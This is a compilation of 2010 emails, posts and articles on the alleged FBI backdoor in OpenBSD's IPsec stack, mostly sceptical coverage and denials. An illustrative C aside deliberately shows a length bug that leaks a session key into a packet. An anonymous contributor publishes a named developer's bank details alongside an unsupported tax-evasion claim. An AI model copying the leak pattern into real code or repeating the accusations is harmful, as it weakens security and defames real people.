http://ieeexplore.ieee.org/xpl/freeabs_all.jsp?arnumber=5514572

“Neural Network Approach to Locating Cryptography in Object Code”
Jason L. Wright and Milos Manic. In Proceedings International Conference on Emerging Technologies and Factory Automation (ETFA), September 2009, Palma de Mallorca, Spain. doi:10.1109/ETFA.2009.5347226
http://www.inl.gov/technicalpublications/Documents/4363837.pdf
http://dx.doi.org/10.1109/ETFA.2009.5347226

“Time Synchronization in Hierarchical TESLA Wireless Sensor Networks”
Jason L. Wright and Milos Manic. In Proceedings International Symposium on Resilient Control Systems (ISRCS), pp. 36-39, August 2009, Idaho Falls, ID, USA. doi:10.1109/ISRCS.2009.5251365
http://www.inl.gov/technicalpublications/Documents/4336149.pdf
http://dx.doi.org/10.1109/ISRCS.2009.5251365

“Finding Cryptography in Object Code”
Jason L. Wright. In Proceedings Security Education Conference: Toronto (SECTOR). October 2008, Toronto, ON, Canada. (slides)
http://thought.net/jason/cv/CON-08-14597-paper.pdf
http://thought.net/jason/cv/CON-08-14597-slides.pdf

“Recommended Practice for Securing Control System Modems”
James R. Davidson and Jason L. Wright. U.S. Department of Homeland Security National Cyber Security Division, Control Systems Security Program. January 2008.
http://csrp.inl.gov/Documents/SecuringModems.pdf

“Cryptography As An Operating System Service: A Case Study”
Angelos D. Keromytis, Theo de Raadt, Jason L. Wright, and Matthew Burnside. In ACM Transactions on Computer Systems (ToCS), vol. 24, no. 1, pp. 1 – 38, February 2006. (Extended version of USENIX Technical 2003 paper). doi:10.1145/1124153.1124154
http://thought.net/jason/cv/p1-keromytis.pdf
http://portal.acm.org/citation.cfm?doid=1124153.1124154

“The Design of the OpenBSD Cryptographic Framework”
Angelos D. Keromytis, Jason L. Wright, and Theo de Raadt. In Proceedings of the USENIX Annual Technical Conference, pp. 181 – 196. June 2003, San Antonio, TX. (Acceptance rate: 23.3%)
http://thought.net/jason/cv/ocf.pdf

“Experiences Enhancing Open Source Security in the POSSE Project”
Jonathan M. Smith, Michael B. Greenwald, Sotiris Ioannidis, Angelos D. Keromytis, Ben Laurie, Douglas Maughan, Dale Rahn, and Jason L. Wright. In Free/Open Source Development, Stefan Koch (editor), pp. 242 – 257. Idea Group Publishing, 2004. Also re-published in Global Information Technologies: Concepts, Methodologies, Tools, and Applications, Felix B. Tan (editor), pp. 1587- 1598. Idea Group Publishing, 2007.
http://thought.net/jason/cv/posse-chapter.pdf
http://thought.net/jason/cv/4-28.pdf

“Transparent Network Security Policy Enforcement”
Angelos Keromytis and Jason Wright. In Proceedings of the USENIX Annual Technical Conference, Freenix Track, pp. 215 – 226. June 2000, San Diego, CA. (Acceptance rate: 30%)
http://thought.net/jason/cv/bridgepaper.pdf

Presentations

“When Hardware is Wrong, or ‘They Can Fix it in Software’”
NYC BSD Conference, October 2008.
http://thought.net/jason/cv/hardware-wrong.pdf

“OpenBSD/sparc64”
NYC BSD Conference, October 2006.


CRYPTOME
http://cryptome.org/0003/fbi-backdoors.htm

21 December 2010. A sends:

Just to point out that one of the ex-developers involved in that period has posted some background info. You can contact Mickey yourself for more information: “how i stopped worrying and loved the backdoor”

http://mickey.lucifier.net/b4ckd00r.html

By the way, anybody want to elaborate how Theo de Raadt has been hiding 2 donations accounts from Canadian Tax Revenue Services for years now?

(PayPal, and the German account below.)

IBAN: DE91 7007 0024 0338 1779 00
BIC: DEUT DE DBMUC
Name: Theo de Raadt
Address: Deutsche Bank, Marienplatz 21
80331 München, Germany

Inside Germany, instead use:

Name: Theo de Raadt
Bank: Deutsche Bank München
BLZ: 70070024
Konto: 338177900

From outside Europe:

SWIFT: DEUTDEDBMUC
Account: 7007 0024 0338 1779 00
Name: Theo de Raadt
Address: Deutsche Bank, Marienplatz 21
80331 München, Germany

__________

20 December 2010. Gregory Perry further responds with the truth about the FBI:

From: Gregory Perry <Gregory.Perry[at]GoVirtual.tv>
To: John Young <jya[at]pipeline.com>
Subject: RE: OpenBSD Crypto Framework
Date: Mon, 20 Dec 2010 14:33:54 +0000

The issue of retribution has been going on for over a decade at this point; the FBI is a lawless and corrupt organization with little hope for rehabilitation.  Maybe one day the Congress will issue a subpoena into their domestic ops and related skullduggery.

_________

From: John Young <jya[at]pipeline.com>
Sent: Monday, December 20, 2010 9:06 AM
To: Gregory Perry
Subject: RE: OpenBSD Crypto Framework

Thanks very much for responding. If you care to do so, we would like to hear of any retribution for disclosing the hole. Wikileaks we’re not, but quieter. Anonymous is our best source.


20 December 2010. Gregory Perry responds:

From: Gregory Perry <Gregory.Perry[at]GoVirtual.tv>
To: John Young <jya[at]pipeline.com>
Subject: RE: OpenBSD Crypto Framework
Date: Mon, 20 Dec 2010 02:17:23 +0000

I really wish Theo hadn’t made that email public, it’s really stirred up things quite a bit in the mainstream media.

To put things into perspective, the salient points to consider are:

1)  I sent a private letter to Theo de Raadt, urging him to perform a source code audit of the OpenBSD Project based upon the allegations contained within the original email you referenced;

2)  Theo then sent, without my permission and against my wishes, the entire contents of that email with my contact particulars to a public listserver, which ignited this firestorm of controversy that I am now seemingly embroiled in;

3)  If I had this to do over again, I would have sent an anonymous postcard to Wikileaks probably;

4)  I have absolutely, positively nothing to gain from making those statements to Theo, and only did so to encourage a source code audit of the OpenBSD Project based upon the expiry of my NDA with the FBI; and,

5)  Being in any limelight is not my bag at all.

I personally hired and managed Jason Wright as well as several other developers that were involved with the OpenBSD Project, I am intimately familiar with OpenBSD having used it for a variety of commercial products over the years, and I arranged the initial funding for the cryptographic hardware accelerated OCF and gigabit Ethernet drivers by way of a series of disbursements of equipment and development monies made available via NETSEC (as well as my own personal donations) to the OpenBSD Project.

Although I don’t agree with what Theo did last week, I will say that he is a brilliant and very respected individual in the computer security community and he would have in no way agreed to intentionally weaken the security of his project.  Theo is an iron-fisted fascist when it comes to secure systems architecture, design, and development, and there is no better person than him and his team to get to the bottom of any purported issues with the OpenBSD security controls and its various internal cryptographic frameworks.

Many, many commercial security products and real time embedded systems are derived from the OpenBSD Project, due to Theo’s liberal BSD licensing approach contrasted with other Linux-based operating systems licensed under the GPL.  Many, many commercial security products and embedded systems are directly and proximately affected by any lapse in security unintentional or otherwise by the OpenBSD Project.  Almost every operating system on the planet uses the OpenSSH server suite, which Theo and his team created with almost zero remuneration from the many operating systems and commercial products that use it without credit to the OpenBSD Project.  Given the many thousands of lines of code that the IPSEC stack, OCF, and OpenSSL libraries consist of, it will be several months before the dust settles and the true impact of any vulnerabilities can be accurately determined; it’s only been about 96 hours since their source code audit commenced and your recent article points to at least two vulnerabilities discovered so far.

I wish Theo and his team the best of success with their project and endeavors.

Kind regards

Gregory Perry
Chief Executive Officer
GoVirtual® Education
http://www.GoVirtual.tv
P: 540-645-6955 x111
F: 877-648-0555
C: 540-931-9099
E: Gregory.Perry[at]GoVirtual.tv

GoVirtual® Education
10400 Courthouse Rd. #280
Spotsylvania, Virginia 22553

“VMware Training Products and Services”

Subscribe to the GoVirtual® Newsletter


15 December 2010. A3 sends a link to a refutation of Perry’s claims by Jason Wright, one accused by Perry:

http://marc.info/?l=openbsd-tech&m=129244045916861&w=2

15 December 2010. A sends a link to a report on Perry’s affirmation of his claims, and new ones as well:

http://blogs.csoonline.com/1296/an_fbi_backdoor_in_openbsd

15 December 2010. A1 and A2 send an account of denials by named participants and a fruitless effort to contact Perry:

http://www.itworld.com/open-source/130820/openbsdfbi-allegations-denied-named-participant

A pointer to any response from Perry would be appreciated. Send to: cryptome[at]earthlink.net.

15 December 2010. A sent the same URL. Cryptome response:

Thanks for the pointer. Strong stuff, naming names, very unusual, likely to lead to professional suicide. Smells like a hoax or a competitor smear. We wrote last night to the alleged author of the allegations for confirmation but have not received an answer. This is not to doubt that the TLAs do this regularly, but to admit complicity is exceptional and, if genuine, an admirable public service. If the attribution is a hoax or a smear we’d like to make that known. Have you seen his confirmation or denial anywhere?

He may be in hiding or a sweat hole.

14 December 2010


Michael Shalayeff, (former OpenBSD Developer)
http://mickey.lucifier.net/b4ckd00r.html
how i stopped worrying and loved the backdoor
A lie gets halfway around the world before the truth has a chance to get its pants on.
winston churchill

first of all i have to mention that netsec involvement was indirectly one of the first financial successes of theo de raadt (later mr.t for short) as the sale of 2500 cds through the EOUSA project (one for each us-ins office in the country) brought openbsd to profitable state and allowed mr.t to finance his living by means of the openbsd project.

but let us get back to our sheep (so to speak). as “the disclosure” from herr gregory perry mentioned, the parts involved were the ipsec(4) and crypto(4) framework and the “gigabit ethernet stack.” but see? there is no such thing as a “gigabit ethernet stack.” moreover back then all the gigabit ethernet drivers came from freebsd. they were written almost exclusively by bill paul who worked at columbia.edu. he himself does not always disclose where he gets the docs or other tech info for the driver development. drivers were ported to openbsd by jason@ (later mr.j). angelos@ (later mr.a) (who was contracted by netsec to work on the crypto framework in openbsd) was a post-grad student at upenn.edu at the time and had contacts at columbia such as his friend and fellow countryman ji@ who worked there. ji@ wrote the ipsec stack initially (for bsd/os 2.0) in 1995. mr.a was porting it to openbsd. if memory serves me right it was during the summer of 2002 that a micro-hacking-session was held at columbia.edu. for less than one week, participating were the well-known-to-us-already mr.t and mr.j and mr.a, with an addition of drahn@ and yours truly. primary goal was to hack on the OCF (crypto framework in openbsd). this does not affect crypto algorithms you’d say, right? but why try to plant subtle and enormously-complicated-to-develop side channels into math (encryption and hashing) when it’s way easier to just make the surrounding framework misbehave and leak bits elsewhere? why not just semioccasionally send an ipsec(4) packet with a plain text key appended to it? the receiver will drop it as broken (check your ipsec stats!) and the sniffer in the middle has the key! how would one do it? a little mbuf(9) underflow combined with a little integer overflow. not that easy to spot if more than just one line of code is involved. but this is just a really crude example. leaking by just tiny bits over a longer time period would be even more subtle.
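[Aside: a purely illustrative sketch of the bug class mickey describes, written for this compilation; it is not code from OpenBSD or any real IPsec stack. One sign slip in a length calculation is enough to make the “malformed” packet carry key bytes that happen to sit next to the payload in memory:]

    /* Hypothetical illustration: a signed/unsigned slip in pad-length
       arithmetic makes the outgoing "broken" packet 8 bytes too long,
       and those 8 bytes are the session key adjacent to the payload. */
    #include <stdio.h>
    #include <stdint.h>
    #include <string.h>

    /* Contrived layout: payload in slab[0..15], session key in slab[16..23]. */
    static const uint8_t slab[24] = {
        'p','l','a','i','n','t','e','x','t',' ','b','y','t','e','s','.',
        0xde, 0xad, 0xbe, 0xef, 0x01, 0x02, 0x03, 0x04   /* the key */
    };

    int main(void) {
        uint8_t pkt[32];
        int8_t padlen = -8;       /* corrupted pad length (should be +8)  */
        size_t n = 16 - padlen;   /* 16 - (-8) = 24: copies 8 bytes extra */
        memcpy(pkt, slab, n);     /* payload plus the trailing key bytes  */

        /* The receiver drops the oversized packet as broken (check your
           ipsec stats!), but a sniffer in the middle now holds the key: */
        printf("leaked trailer: ");
        for (size_t i = 16; i < n; i++)
            printf("%02x", pkt[i]);
        printf("\n");
        return 0;
    }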

here are just some observations i had made during ipsec hacking years later… some parts of the ipsec code were, to say the least, strange looking. in some places tiny loops were used where normally one would use a function (such as memcpy(3)) or a bulk random data fetch instead of fetching byte by byte. one has to know that to generate 16 bytes of randomness by the random(4) driver (not the arc4 bit) it would take an md5 algorithm run over 4096 bytes of the entropy pool. of course to generate only one byte 15 bytes would have to be wasted. and thus fetching N bytes one-by-one instead of filling a chunk would introduce a measurable time delay. ain’t these look like pieces of timing weaknesses introduced in ipsec processing in order to make encrypted data analysis easier? some code pieces created buffer underflows leaving uninitialised data, or in other words leaking information, as well. a common technique to hide changes was (and still is sometimes) to shuffle the code around the file or between different files and directories, making actual code review a nightmare. but to be just, lots of those things have since been fixed (even by meself).
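[Aside: the hashing arithmetic above, using the numbers from mickey’s post rather than anything measured. If every draw costs one MD5 pass over the 4096-byte pool and yields 16 usable bytes, fetching 16 bytes one at a time does sixteen times the work of a single bulk fetch, the kind of delay an observer can time:]

    /* Back-of-envelope model of the byte-by-byte fetch cost described
       above; the constants come from the post, not from profiling. */
    #include <stdio.h>

    int main(void) {
        const int pool_bytes = 4096;   /* entropy pool hashed per draw */
        const int out_bytes  = 16;     /* usable MD5 output per draw   */
        const int want       = 16;     /* randomness actually needed   */

        int bulk     = (want + out_bytes - 1) / out_bytes;   /* 1 pass    */
        int bytewise = want;                                 /* 16 passes */

        printf("bulk fetch:   %d MD5 pass over %d bytes\n", bulk, pool_bytes);
        printf("byte-by-byte: %d MD5 passes, %dx the work (a timeable delay)\n",
               bytewise, bytewise / bulk);
        return 0;
    }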

as the great ones teach us an essential part of any cryptographical system is the random numbers generator. your humble servant was involved in it too and right there in yer olde brooklyn. one breezy spring night i wrote the openbsd random(4) driver that was based on the linux driver written by theodore tso. and of course the output has never been statistically analysed since the day i wrote it. no doubt i ran some basic tests with help of mamasita (she’s keen on math and blintzi). later the arc4 part was added by david maziers (dm@) who was also a friend of mr.a at the time and an openbsd developer. since then a number of vulnerabilities were discovered in the arc4 algorithm and subsequently the driver. most notably this potential key leak.
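[Aside: for readers who haven’t met the cipher under discussion: arc4 is “alleged RC4”, a stream cipher. The textbook algorithm is short enough to show here, and it illustrates why the early keystream worried people: the key schedule only lightly stirs the state, so the first output bytes are statistically correlated with the key, which is why later arc4random implementations throw away the start of the stream. This is the standard published algorithm, not the OpenBSD driver’s code:]

    /* Textbook RC4 ("alleged RC4", hence arc4). Standard published
       algorithm, shown for illustration; not the OpenBSD driver. */
    #include <stdio.h>
    #include <stdint.h>

    static uint8_t S[256];

    /* Key schedule: one light stir of the state with the key. */
    static void rc4_init(const uint8_t *key, size_t keylen) {
        for (int i = 0; i < 256; i++)
            S[i] = (uint8_t)i;
        uint8_t j = 0;
        for (int i = 0; i < 256; i++) {
            j = j + S[i] + key[i % keylen];   /* wraps mod 256 */
            uint8_t t = S[i]; S[i] = S[j]; S[j] = t;
        }
    }

    int main(void) {
        const uint8_t key[5] = { 0x01, 0x02, 0x03, 0x04, 0x05 };
        rc4_init(key, sizeof(key));

        /* Output loop (PRGA): the first bytes are the biased ones;
           hardened implementations discard hundreds of them. */
        uint8_t i = 0, j = 0;
        for (int n = 0; n < 8; n++) {
            i = i + 1;
            j = j + S[i];
            uint8_t t = S[i]; S[i] = S[j]; S[j] = t;
            printf("%02x ", S[(uint8_t)(S[i] + S[j])]);
        }
        printf("\n");   /* known test vector: b2 39 63 05 f0 3d c0 27 ... */
        return 0;
    }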

meanwhile in calgary… wasting no time netsec was secretly funnelling “security fixes” through mr.t that he was committing “stealth” into the openbsd tree. (this i only knew years later when i was telling mr.t over a beer about the funny people i met on a west-coast trip (see later)). “stealth” means that the purpose of the diffs was not disclosed in the commit messages or the private openbsd development forums except with a few “trusted” developers. it was a custom to hide important development in the openbsd project at that time due to a large netbsd-hate attitude (which also existed from the other side in form of an openbsd-hate attitude; just check out this netbsd diff and an openbsd fix later; or a more recent “rewrite for clarity” commit that in fact changes functionality), which was a result of the bulk updates of the openbsd sources from netbsd that we were doing back then due to the lack of our own developers in many parts of the tree. in this massive code flow it was easy to sneak in a few lines here and there and make sure the “others” would not notice the importance of the change. of course this “stealth” attitude did not stop once openbsd got more developers and continued also in the ipsec areas (see for example). after all “security” was one of the main important keywords that were separating openbsd from netbsd back then. as we can see, holding this funnel for netsec is putting mr.t on the payroll also.

actually it would be all too easy to spot the malicious code if it were all in the publicly-available sources. this leads us to believe that bits of the solution were in the hardware. unsurprisingly netsec was producing their own version of the hifn(4) crypto accelerator. unfortunately hifn was refusing to disclose full docs for their hifn7751 chip and that prevented the driver from being included in the openbsd base system. (in the beginning the driver was called aeon, since at that time development was done on pre-netsec cards, and the driver was renamed (see mv(1)) manually in the cvs repository files later on). as a bit-chewing disasm-pervert i was asked to reverse engineer their “unlocking” program. that was some magic sequence (since then it’s in the driver) that would initialise the hifn7751 after power-on and allow it to work. they had provided a sample program and challenged us. mr.t set up a machine for me in his house and i logged in remotely from my home in brooklyn to debug the c-code i devised from the disassembly of the unlocking proggy (see they did not even strip(1) it! ;). it was without any help from anybody else except for mr.t who was playing a role of my reset-monkey and yeah mamasita who was bitching at me for being late for dinner… and that worked. this was to show hifn that their “protection” is crap on the stack. the driver for the devices was written by mr.j who had access to public docs that lacked the “unlocking” sequence. this allowed netsec to start deploying their hifn(4)-based cards which no doubt were a part of the side-channel scheme. about the same time at the bazaar show in nyc i was contacted by a representative of us-ins and a ukrainian military attache at un. both investigating my involvement with openbsd. a few months later i was offered an interview for a position at the fbi office for cyber-warfare in nyc who as well offered to fix my immigration status (or none thereof at the time ;) with a greencard. nonetheless for the lack of credibility from the future employer i refused to talk to them as for me deportation did not sound like an acceptable worst-case scenario.

soon enough due to professional contacts of mr.a the darpa grant for the openbsd was materialised. this was for two years work on various crypto technologies to be integrated in openbsd.

a lot of the code resulting from the work sponsored by the grant still is in the repository except for parts that were done just for the noise and uncommitted later. of course no wonder that darpa grant was spent primarily on mr.t and mr.j. i would expect mr.a was on benefit indirectly. three other developers on the payroll i suppose had to be there so it would not look completely obvious as a payment to mr.t and mr.j. initially mr.t offered me a position on it too but due to upenn.edu restrictions i could not be involved legally (as you can remember i had an expired immigrant status in the country of u.s. of a.). this was slightly disappointing as i had to spend money for coming all the way to philly for the meeting and as it seems for nothing. at least my trip to the following usenix anu-tech in monterey was paid by the moneys from the grant. at the time it only looked kinda funny to travel on the enemy capitalist government’s budget ;) monterey by itself has not much of excitement but for the beach scenery and the cia agents for eastern-europe training camp. that would explain the body search at the greyhound bus boarding (this was before the post-2001 scare) which ignored the knife and a whisky bottle i had in my pockets. before going to monterey and while exploring the beauty of san francisco i was contacted once by a us navy intelligence officer who seemingly unintentionally appeared next to me at the bar. later on my way back, during a short stay in chicago, there was also a randomly appearing fbi agent. fellow was ordering food and beer for me and just like his navy pal gave me a warning to keep my mouth shut!

references:

paranoic mickey       (my employers have changed but the name has remained)

INTERNET STORM CENTER
OpenBSD IPSec “Backdoor”
http://isc.sans.edu/diary.html?storyid=10087

Published: 2010-12-15,
Last Updated: 2010-12-15 16:21:23 UTC
by Johannes Ullrich (Version: 1)

We received plenty of e-mail alerting us to a mailing list post [1] alleging a backdoor in the OpenBSD IPSec code. The story is too good to pass up and has been repeated on Twitter and other media. However, aside from the mailing list post, there is little if any hard evidence of such a backdoor. The code in question is 10 years old. Since then, it has been changed, extended, patched and copied many times. I personally have neither the time nor the skill to audit code of the complexity found in modern crypto implementations. But my gut feeling is that this is FUD if not an outright fraud.

Keep using VPNs; if you are worried, limit the crypto algorithms used to more modern ones. It is always a good idea to build additional defensive layers and review configurations from time to time. But at some point, you have to decide who you trust in this game and how paranoid you can afford to be.

[1] http://marc.info/?l=openbsd-tech&m=129236621626462&w=2
——
Johannes B. Ullrich, Ph.D.
SANS Technology Institute


FBI accused of planting backdoor in OpenBSD IPSEC stack
By Ryan Paul
http://arstechnica.com/open-source/news/2010/12/fbi-accused-of-planting-backdoor-in-openbsd-ipsec-stack.ars

In an e-mail sent to BSD project leader Theo de Raadt, former NETSEC CTO Gregory Perry has claimed that NETSEC developers helped the FBI plant “a number of backdoors” in the OpenBSD cryptographic framework approximately a decade ago.

Perry says that his nondisclosure agreement with the FBI has expired, allowing him to finally bring the issue to the attention of OpenBSD developers. Perry also suggests that knowledge of the FBI’s backdoors played a role in DARPA’s decision to withdraw millions of dollars of grant funding from OpenBSD in 2003.

“I wanted to make you aware of the fact that the FBI implemented a number of backdoors and side channel key leaking mechanisms into the OCF, for the express purpose of monitoring the site to site VPN encryption system implemented by EOUSA, the parent organization to the FBI,” wrote Perry. “This is also probably the reason why you lost your DARPA funding, they more than likely caught wind of the fact that those backdoors were present and didn’t want to create any derivative products based upon the same.”

The e-mail became public when de Raadt forwarded it to the OpenBSD mailing list on Tuesday, with the intention of encouraging concerned parties to conduct code audits. To avoid entanglement in the alleged conspiracy, de Raadt says that he won’t be pursuing the matter himself. Several developers have begun the process of auditing the OpenBSD IPSEC stack in order to determine if Perry’s claims are true.

“It is alleged that some ex-developers (and the company they worked for) accepted US government money to put backdoors into our network stack,” de Raadt wrote. “Since we had the first IPSEC stack available for free, large parts of the code are now found in many other projects/products. Over 10 years, the IPSEC code has gone through many changes and fixes, so it is unclear what the true impact of these allegations are.”

OpenBSD developers often characterize security as one of the project’s highest priorities, citing their thorough code review practices and proactive auditing process as key factors that contribute to the platform’s reputedly superior security. If Perry’s allegations prove true, the presence of FBI backdoors that have gone undetected for a decade would be a major embarrassment for OpenBSD.

The prospect of a federal government agency paying open source developers to inject surveillance-friendly holes in operating systems is also deeply troubling. It’s possible that similar backdoors exist on other software platforms. It’s still too early to know if the claims are true, but the OpenBSD community is determined to find out if they are.


Deconstructing the OpenBSD IPsec Rumors
2010-12-14 21:58:01 by Jason Dixon
http://obfuscurity.com/2010/12/Deconstructing-the-OpenBSD-IPsec-Rumors

Theo de Raadt posted an email to the openbsd-tech mailing list Tuesday evening which contained details of alleged backdoors added to the OpenBSD IPsec code by government contractors some ten years ago. Subsequent posts from Bob Beck and Damien Miller add further commentary, but neither confirm nor deny the allegations. Damien goes so far as to propose a number of possible avenues as the most likely places to begin a new audit.

One of the purported conspirators is Jason Wright, a cryptology expert at the Idaho National Laboratory, who committed a significant amount of crypto and sparc64 code to the OpenBSD project. Although I haven’t seen Jason in years, I consider “Wookie” a good friend and hope these accusations are false. If Damien’s hypothesis is correct, it seems highly unlikely that Jason (or any US developers) introduced backdoors directly into the crypto code. A more likely scenario would be the malicious reuse of mbufs in the network stack.

As Brian T. Merritt suggests, it seems even more likely that Linux would be similarly “exploited”. Let’s not forget that while these claims against OpenBSD revolve around FBI involvement, Linux has had significant portions of its security code infiltrated by the NSA. Between these two code bases you’re talking about an enormous portion of the networking infrastructure that powers the Internet.

As a former OpenBSD committer, this saddens me. Not just because of the possibility that this might be true, but that regardless of whether or not this could be true, it means that developer and community resources will be swallowed into the rumor vacuum for untold weeks and possibly months. This results in less innovation, fewer bugfixes, and worst of all, a growing distrust among everyone involved.

This story has all the characteristics of being newsworthy for a long while. It has already made major headlines across Twitter, Slashdot, Reddit and OSNews. Most articles and tweets imply that the claims are fact, without any investigation of the source claim or the actual code in question. I hope that all parties involved are cleared of any wrongdoing. Either way, the cat is out of the proverbial bag. These claims will undermine a significant portion of goodwill and trust among all Free Software / Open Source projects. In the end, nobody wins.


The OpenBSD IPSec kerfuffle
Michael W Lucas, December 15th, 2010
http://blather.michaelwlucas.com/?p=452

By now you’ve probably heard of the allegations Theo forwarded to the OpenBSD-tech mailing list about the FBI introducing back doors in early versions of the OpenBSD IPSec code.  I’d like to offer my opinion, in the spirit of the Christmas season:

“Bah, humbug!”

It’s possible, but unlikely.  Like me winning the lottery is unlikely.  I’d need to buy a ticket, and that isn’t going to happen any time soon.

The OpenBSD group examines every line of code that goes into their tree.  Any obvious back door would be caught.  Any  subtle back door would be fragile — so subtle that it probably wouldn’t survive the intervening ten years of code churn and IPSec improvements.  Maybe someone has an appliance based on, say, OpenBSD 2.8 or 3.2, which could have contained the back door.  If true, we need to know about it.  But those users need to upgrade anyway.

And the FBI?  Nope, don’t believe it.  Ten years ago, the FBI was having lots of trouble understanding the Internet.  The NSA, maybe.

Bugs?  Sure, there’s probably bugs.  I expect we’ll find some, now that many eyes have turned to the code.  Exploitable bugs?  Maybe.  But that’s not the same as a back door.

OpenBSD has claimed to be the best for many years.  That claim motivates people to take them down.  The claims have hopefully inspired many people to examine the current and historical IPSec stack.  Theo and company have done nothing to discourage such audits: they’ve even offered pointers on where to look.  If you’re a programmer looking to make a splash, you could do worse than to join in on auditing the code.  Finding the alleged back door would make your reputation.  And we can always use more IPSec hackers.

The real impact might be, as Jason Dixon points out, the cost in OpenBSD developer time.  You know that some of their committers are examining the IPSec code today, trying to find potential back doors.


Schneier on Security

http://www.schneier.com/blog/archives/2010/12/did_the_fbi_pla.html
A blog covering security and security technology.
December 17, 2010
Did the FBI Plant Backdoors in OpenBSD?
It has been accused of it.
I doubt this is true. One, it’s a very risky thing to do. And two, there are more than enough exploitable security vulnerabilities in a piece of code that large. Finding and exploiting them is a much better strategy than planting them. But maybe someone at the FBI is that dumb.
EDITED TO ADD (12/17): Further information is here. And a denial from an FBI agent.
Posted on December 17, 2010 at 10:49 AM


FREEBSD DEVELOPER POSTS TRIPLE-BOUNTY FOR OPENBSD FLAWS
Dag-Erling Smørgrav (aka DES)
2010-12-15
http://maycontaintracesofbolts.blogspot.com/2010/12/openbsd-ipsec-backdoor-allegations.html

OpenBSD IPSec backdoor allegations: triple $100 bounty
In case you hadn’t heard: Gregory Perry alleges that the FBI paid OpenBSD contributors to insert backdoors into OpenBSD’s IPSec stack, with his (Perry’s) knowledge and collaboration.

If that were true, it would also be a concern for FreeBSD, since some of our IPSec code comes from OpenBSD.

I’m having a hard time swallowing this story, though. In fact, I think it’s preposterous. Rather than go into further detail, I’ll refer you to Jason Dixon’s summary, which links to other opinions, and add only one additional objection: if this were true, there would be no “recently expired NDA”; it would be a matter of national security.

I’ll put my money where my mouth is, and post a triple bounty:

1) I pledge USD 100 to the first person to present convincing evidence showing:
– that the OpenBSD Crypto Framework contains vulnerabilities which can be exploited by an eavesdropper to recover plaintext from an IPSec stream,
– that these vulnerabilities can be traced directly to code submitted by Jason Wright and / or other developers linked to Perry, and
– that the nature of these vulnerabilities is such that there is reason to suspect, independently of Perry’s allegations, that they were inserted intentionally—for instance, if the surrounding code is unnecessarily awkward or obfuscated and the obvious and straightforward alternative would either not be vulnerable or be immediately recognizable as vulnerable.
2) I pledge an additional USD 100 to the first person to present convincing evidence showing that the same vulnerability exists in FreeBSD.
3) Finally, I pledge USD 100 to the first person to present convincing evidence showing that a government agency successfully planted a backdoor in a security-critical portion of the Linux kernel.

Additional conditions:
– In all three cases, the vulnerability must still be present and exploitable when the evidence is assembled and presented to the affected parties. Allowances will be made for the responsible disclosure process.
– Exploitability must be demonstrated, not theorized.
– I will not evaluate the evidence myself, but rely on the consensus of the OpenBSD, FreeBSD, Linux and / or infosec communities.
– Primacy will be determined in a similar manner.
– The evidence must be presented, and the bounty claimed, no later than 2012-12-31 23:59:59 UTC—a little more than two years from today.
– The bounty will, at the claimant’s discretion, either be transferred to the claimant by PayPal—no cash, checks, direct deposits or wire transfers—or donated directly to a non-profit of his or her choice.

Dag-Erling Smørgrav can be reached at:
des@des.no


OpenBSD/FBI allegations denied by named participants
Update: Government shilling accusations refuted by both similarly named persons
Tags: backdoors, EOUSA, FBI, OpenBSD
Brian Proffitt, December 14, 2010, 10:32 PM — http://www.itworld.com/open-source/130820/openbsdfbi-allegations-denied-named-participant

Update: This story was updated at 0920 on Dec. 15 to include comments from the second Scott Lowe, and expand on additional questions now sent to Gregory Perry.

Amidst startling accusations revealed by OpenBSD founder and lead developer Theo de Raadt today that 10 years ago the US Federal Bureau of Investigation paid developers to insert security holes into OpenBSD code, some confusion about the accusations has already emerged, with one named party strongly denying any involvement.

According to a post by de Raadt on the [openbsd-tech] mailing list, he received an email from Gregory Perry, CEO of GoVirtual Education, a Florida-based VMWare training firm, in which Perry told de Raadt he was “aware of the fact that the FBI implemented a number of backdoors and side channel key leaking mechanisms into the OCF, for the express purpose of monitoring the site to site VPN encryption system implemented by EOUSA [the Executive Office for United States Attorneys, part of the US Dept. of Justice], the parent organization to the FBI.”

In his message to de Raadt, Perry stated that while Perry was the CTO at NETSEC, “Jason Wright and several other developers were responsible for those backdoors.” Perry said that he was now able to share this information with de Raadt because his non-disclosure agreement with the FBI had “recently expired.”

If true, this type of government involvement would enhance the already present concerns free and open source developers tend to have about government policies concerning privacy.

But there are already challenges about the accuracy of Perry’s statements.

For instance, at the close of his message to de Raadt, Perry stated that the presence of these backdoors was why “several inside FBI folks have been recently advocating the use of OpenBSD for VPN and firewalling implementations in virtualized environments.”

“For example,” Perry concluded, “Scott Lowe is a well respected author in virtualization circles who also happens top [sic] be on the FBI payroll, and who has also recently published several tutorials for the use of OpenBSD VMs in enterprise VMWare vSphere deployments.”

I contacted Scott Lowe, VMWare-Cisco Solutions Principal at EMC, this evening to ask if he had a comment about Perry’s statement to de Raadt. Lowe quickly responded via e-mail with his denial:

“Mr. Perry is mistaken. I am not, nor have I ever been, affiliated with or employed by the FBI or any other government agency. Likewise, I have not ever contributed a single line of code to OpenBSD; my advocacy is strictly due to appreciation of the project and nothing more,” Lowe replied.

When I followed up with the question of why Perry might want to implicate Lowe for assisting the FBI in promoting OpenBSD, Lowe replied, “I do not know why Mr. Perry mentioned my name. I do know that there is another Scott Lowe, who also writes about virtualization, to whom Mr. Perry might be referring; I don’t have any information as to whether that individual is or is not involved.”

Mr. Lowe from North Carolina has been confused with the other Scott Lowe, Vice President and Chief Information Officer at Westminster College in Missouri, before.

Update: Mr. Lowe of Missouri was contacted for comment late last night, and did reply to my questions via e-mail early this morning.

“I am not, nor have I ever been, on the FBI’s payroll, nor do I use or advocate the use of OpenBSD either personally or in my writing,” Lowe of Missouri replied.

Perry may have gotten his Scott Lowes confused; stranger things have happened. Earlier in my own career, I was often confused with Brian Proffit, a prolific and excellent writer about OS/2 who is also a Baptist minister (trust me, I’m the evil twin).

The North Carolina Lowe has published articles and books on VMWare, while the Missouri Lowe has published his work primarily on TechRepublic, with more of a focus on Microsoft technologies, rather than VMware.

With the response of both Lowes on record, the question of mistaken identity becomes moot. It now becomes Perry’s word against that of two Scott Lowes that one of these gentlemen was promoting OpenBSD on behalf of the FBI. It makes me wonder if Perry was speculating about Lowe’s alleged involvement with the FBI.

I have reached out to Perry for comment; specifically, to ask him to elaborate on the evidence he has regarding the involvement of a Scott Lowe, and to identify which Scott Lowe he was referring to. As of 0920 EST on December 15, no reply from Perry has been received.


An FBI backdoor in OpenBSD?
by Robert McMillan, Security Blanket
Wed, 2010-12-15 09:06
Topic(s): Data Protection
http://blogs.csoonline.com/1296/an_fbi_backdoor_in_openbsd

You have to give Theo de Raadt credit: he’s into openness. What other software product would take serious, but questionable allegations about an FBI-planted back door in its code and just go public with them?

